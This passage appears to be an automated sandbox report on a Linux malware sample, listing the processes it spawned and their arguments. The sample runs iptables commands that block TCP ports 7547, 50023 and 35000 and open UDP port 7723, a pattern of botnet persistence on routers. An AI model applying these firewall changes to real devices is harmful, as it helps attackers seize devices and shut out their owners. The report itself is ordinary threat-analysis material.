                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p udp --dport 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:08
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/upstart
                                                                                                                        Arguments:n/a
                                                                                                                        File size:0 bytes
                                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/date
                                                                                                                        Arguments:date
                                                                                                                        File size:68464 bytes
                                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/usr/share/apport/apport-checkreports
                                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                                        File size:1269 bytes
                                                                                                                        MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/upstart
                                                                                                                        Arguments:n/a
                                                                                                                        File size:0 bytes
                                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/date
                                                                                                                        Arguments:date
                                                                                                                        File size:68464 bytes
                                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/usr/share/apport/apport-gtk
                                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                        File size:23806 bytes
                                                                                                                        MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                                        General

                                                                                                                        Start time:20:59:00
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/upstart
                                                                                                                        Arguments:n/a
                                                                                                                        File size:0 bytes
                                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                                        General

                                                                                                                        Start time:20:59:00
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:00
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:00
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/date
                                                                                                                        Arguments:date
                                                                                                                        File size:68464 bytes
                                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                        General

                                                                                                                        Start time:20:59:00
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:00
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/usr/share/apport/apport-gtk
                                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                        File size:23806 bytes
                                                                                                                        MD5 hash:ec58a49a30ef6a29406a204f28cc7d87